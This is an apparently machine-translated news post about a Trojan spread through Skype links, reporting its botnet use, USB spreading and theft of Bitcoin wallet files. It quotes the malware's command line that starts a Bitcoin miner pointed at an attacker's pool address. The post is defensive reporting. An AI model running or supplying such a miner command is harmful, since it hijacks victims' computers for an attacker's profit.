The blog of Dmitry Bestuzhev expert “Kaspersky Lab”, a few days ago, a message about the massive distribution companies in skype new Trojan. Users sent messages offering to pass on some link types:
On April 4, the intensity of the transition on it was almost 3 clicks per second, and the total number of clicks – about 170K!
Most of the victims – from Russia and Ukraine
Himself Trojan written in Visual Basic, and also is able to spread via USB-drives. After infection, the victim’s computer becomes part of a botnet using to connect to an IRC server protocol command.
Additionally, the Trojan appears to steal a file from wallet.dat Bitcoin wallet:
Once on the user’s machine get infected, it runs the command: Bitcoin miner.exe-A-60-l no-o http://suppp.cantvenlinea.biz:1942/-u XXXXXX0000001@gmail.com-p XXXXXXXX thus making your computer for an attacker to mine Bitcoins! Thus, the load on the CPU increases significantly: Now seems to be sweeping the Internet a new wave of malicious software.
If you see your machine is working hard, using all available CPU resources, you may be infected.
So far VirusTotal shows 12 of 46 AV detection rate. Kaspersky AV detects the malicious sample by its cloud technology with the verdict UDS:DangerousObject.Multi.Generic.
Malware has capabilities to spread via USB too.